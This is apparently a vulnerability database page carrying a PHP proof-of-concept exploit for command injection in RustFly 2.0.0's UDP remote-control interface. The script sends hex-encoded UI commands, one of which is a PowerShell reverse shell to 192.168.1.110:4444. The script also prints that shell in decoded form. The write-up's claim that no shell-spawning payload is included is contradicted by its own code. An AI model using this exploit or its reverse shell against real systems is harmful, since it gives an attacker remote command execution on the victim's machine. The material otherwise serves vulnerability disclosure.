Lucene search
K

📄 RustFly 2.0.0 Event Manipulation

🗓️ 18 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 151 Views

RustFly v2.0.0 accepts raw hex datagram instructions; some sequences enable remote system operations via command injection.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-27476
19 Feb 202620:43
attackerkb
Circl
CVE-2026-27476
20 Feb 202600:20
circl
CNNVD
Bixat RustFly 操作系统命令注入漏洞
19 Feb 202600:00
cnnvd
CVE
CVE-2026-27476
19 Feb 202620:43
cve
Cvelist
CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control
19 Feb 202620:43
cvelist
NVD
CVE-2026-27476
19 Feb 202621:18
nvd
Positive Technologies
PT-2026-20937
19 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-27476
21 Feb 202601:28
redhatcve
Vulnrichment
CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control
19 Feb 202620:43
vulnrichment
=============================================================================================================================================
    | # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://bixat.dev/products/rustfly                                                                                          |
    =============================================================================================================================================
    
    [+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
                     system-level operations. Improper sanitization allows command-level injection.
    
    Steps To Reproduce:
    -------------------
    1) Configure IP and port of RustFly target.
    2) Run this PHP PoC sender script.
    3) Observe behavior change / message processing by RustFly.
    
    =========================================================
    PoC Impact:
    -----------
    * Proof of input injection capability
    * Demonstrates command-carrier transport
    * No shell-spawning payloads included (safe demonstration)
    
    =========================================================
    Instructions:
    -------------
    Save file as:
        poc.php
    
    Run:
        php poc.php
    
    <?php
    $target_ip = "192.168.1.107";
    $target_port = 5005;
    
    $messages = [
        "6D6F76653A2D35352C31303530",  // move:-55,1050
        "646F75626C655F636C69636B",     // double_click
        "746578743A636D64",             // text:cmd
        "6B65793A656E746572",           // key:enter
        // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
        "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
        "6B65793A656E746572",           // key:enter
    ];
    
    $dangerous_powershell = hex2bin($messages[4]);
    echo "=== Warning: Analyzing Dangerous Content ===\n";
    echo "The PowerShell command encoded in hex is:\n";
    echo $dangerous_powershell . "\n\n";
    
    $decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";
    
    echo "=== Security Warning ===\n";
    echo "This code contains a dangerous PowerShell command:\n";
    echo "--------------------------------------------------\n";
    echo $decoded_ps . "\n";
    echo "--------------------------------------------------\n\n";
    echo "This command does:\n";
    echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
    echo "2. Establishes a reverse shell (backdoor connection)\n";
    echo "3. Executes any commands sent by the attacker\n";
    echo "4. Returns results to the attacker\n\n";
    
    echo "Do you want to continue? (yes/no): ";
    $handle = fopen("php://stdin", "r");
    $line = fgets($handle);
    fclose($handle);
    
    if(trim(strtolower($line)) != 'yes') {
        echo "Operation cancelled.\n";
        exit(0);
    }
    
    echo "Continuing...\n\n";
    
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($sock === false) {
        echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
        exit(1);
    }
    
    if (!socket_bind($sock, "0.0.0.0", 0)) {
        echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
        socket_close($sock);
        exit(1);
    }
    
    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));
    
    try {
        foreach ($messages as $index => $msg) {
    
            $binary_msg = hex2bin($msg);
            if ($binary_msg === false) {
                echo "[-] Invalid hex string: $msg\n";
                continue;
            }
            $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
            
            if ($sent === false) {
                echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
            } else {
    
                $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
                echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
    
                if ($index == 4) {
                    echo " Warning: Malicious PowerShell command sent!\n";
                }
            }
            
            sleep(1);
        }
        
        echo "\n[+] All messages sent successfully.\n";
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
        
    } catch (Exception $e) {
        echo "[-] Exception: " . $e->getMessage() . "\n";
    }
    
    finally {
        socket_close($sock);
        echo "[*] Socket closed.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
CVSS 3.19.8
EPSS0.02628
SSVC
151